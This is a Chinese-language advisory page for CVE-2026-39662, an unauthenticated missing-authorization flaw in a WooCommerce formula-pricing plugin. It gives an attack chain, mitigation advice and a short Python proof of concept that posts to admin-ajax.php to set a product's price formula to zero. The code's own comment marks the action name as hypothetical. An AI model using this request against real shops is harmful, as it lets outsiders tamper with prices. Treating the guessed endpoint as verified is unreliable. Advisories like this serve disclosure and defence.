CVE-2026-39662 CVSS 5.3 中危

CVE-2026-39662: WooCommerce公式定价插件权限缺失漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39662

漏洞类型

权限缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Product Price by Formula for WooCommerce

漏洞概述

ProWCPlugins开发的Product Price by Formula for WooCommerce插件存在权限缺失漏洞。由于访问控制安全级别配置不正确，未授权攻击者可利用此漏洞影响系统完整性。该漏洞影响2.5.6及以下版本，攻击无需认证和用户交互，通过网络即可发起。

技术细节

该漏洞核心在于插件未能对特定敏感功能实施足够的权限检查。在WordPress生态中，此类漏洞通常发生在AJAX处理函数或直接调用的API端点处。受影响插件未验证请求者的身份（如检查`current_user_can`）或请求来源的有效性（如nonce验证）。攻击者可构造特定的HTTP POST请求，目标指向插件暴露的未保护接口。由于CVSS评分显示无需认证（PR:N），任何能够访问服务器的攻击者均可触发该漏洞。成功利用后，攻击者可能修改产品价格计算公式或更改相关设置，导致数据完整性受损，进而破坏电商业务的正常定价逻辑。

攻击链分析

STEP 1

信息收集

识别目标站点是否安装了Product Price by Formula for WooCommerce插件，并确认其版本号是否在2.5.6及以下。

STEP 2

漏洞探测

针对插件暴露的未授权接口发送测试请求，验证是否存在权限校验缺失的情况。

STEP 3

漏洞利用

向存在漏洞的端点发送恶意构造的数据包（如修改价格公式的请求），无需用户认证即可执行操作。

STEP 4

达成效果

成功修改后台配置或产品价格公式，导致网站数据完整性受损，影响业务逻辑。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-wordpress-site/wp-admin/admin-ajax.php"
# Hypothetical action based on plugin functionality
payload = {
    "action": "ppbfw_update_formula", 
    "product_id": "1",
    "formula": "0" 
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Exploit attempt sent. Check if configuration changed.")
    else:
        print(f"[-] Received status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Product Price by Formula for WooCommerce <= 2.5.6

防御指南

临时缓解措施

建议立即检查并升级插件至修复了此漏洞的最新版本。如果无法立即升级，应考虑通过Web应用防火墙（WAF）限制对插件相关目录或管理接口的未授权访问，或暂时禁用该插件以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表